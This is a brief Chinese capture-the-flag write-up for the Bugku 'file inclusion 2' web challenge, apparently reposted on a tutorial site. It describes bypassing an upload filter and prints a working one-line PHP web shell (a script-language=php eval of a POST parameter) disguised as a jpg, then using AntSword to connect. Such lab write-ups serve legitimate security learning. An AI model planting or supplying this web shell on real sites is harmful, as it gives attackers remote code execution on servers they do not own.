bugku web 文件包含2

本文主要是介绍bugku web 文件包含2，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

 既然题目为文件包含，说明有文件上传入口被隐藏了，查看源代码

 发现注释表名存在一个upload.php文件，进入查看，果不其然文件上传入口就在该文件中

由于只支持jpg png gif格式的， 先写一个一句话图片马上传一下，然后抓包改为php后缀

 发现还是无法上传成功，可能是后端代码进行了绕过，先不更改后缀直接传jpg格式的文件，上传成功后进行访问

发现<?php  ?>标签被替换成_了，所以无法解析成php文件，这里我们可以使用另一种姿势来写一句话木马

<script language=php>eval($_POST['shell']);</script>

写好后直接用以jpg格式上传，上传成功后使用蚁剑连接，flag就在根目录下

这篇关于bugku web 文件包含2的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！